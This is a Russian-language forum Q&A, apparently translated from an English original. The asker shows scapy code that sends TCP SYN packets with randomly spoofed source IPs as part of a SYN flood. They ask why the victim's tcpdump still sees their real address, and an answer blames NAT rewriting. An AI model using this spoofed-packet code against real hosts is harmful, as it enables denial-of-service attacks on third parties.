Question

Я использую «scapy» для запуска SYN-атаки. Ниже приведен код генерации поддельного IP-адреса в качестве исходного IP-адреса

Wireshark компьютера-злоумышленника захватывает сгенерированный поддельный IP-адрес в качестве исходного IP-адреса, но tcpdump компьютера жертвы фиксирует реальный IP-адрес злоумышленника (НЕ поддельный IP)

Is scapy не может обмануть tcpdump? или что-то не так с моим кодом?

        IP_Packet = IP()
        IP_Packet.src = randomIP()  #generate a fake IP as source IP
        IP_Packet.dst = dstIP

        TCP_Packet = TCP()
        TCP_Packet.sport = s_port
        TCP_Packet.dport = dstPort
        TCP_Packet.flags = "S"
        TCP_Packet.seq = s_eq
        TCP_Packet.window = w_indow

        send(IP_Packet / TCP_Packet, verbose=0)

jfeldzy · Answer 1 · 17 января 2020

Если компьютер жертвы не находится в той же сети, что и злоумышленник, ваш маршрутизатор, вероятно, заменяет исходный IP-адрес во время преобразования NAT. жертва получает (правильный) общедоступный IP-адрес c вместо (поддельного) частного IP-адреса

Python "scapy": фальшивый ip не может обмануть tcpdump

Пожалуйста, войдите или зарегистрируйтесь чтобы ответить на этот вопрос.

1 Ответ

Пожалуйста, войдите или зарегистрируйтесь что бы добавить комментарий.

Python "scapy": фальшивый ip не может обмануть tcpdump

Пожалуйста, войдите или зарегистрируйтесь чтобы ответить на этот вопрос.

1 Ответ

Пожалуйста, войдите или зарегистрируйтесь что бы добавить комментарий.

Похожие темы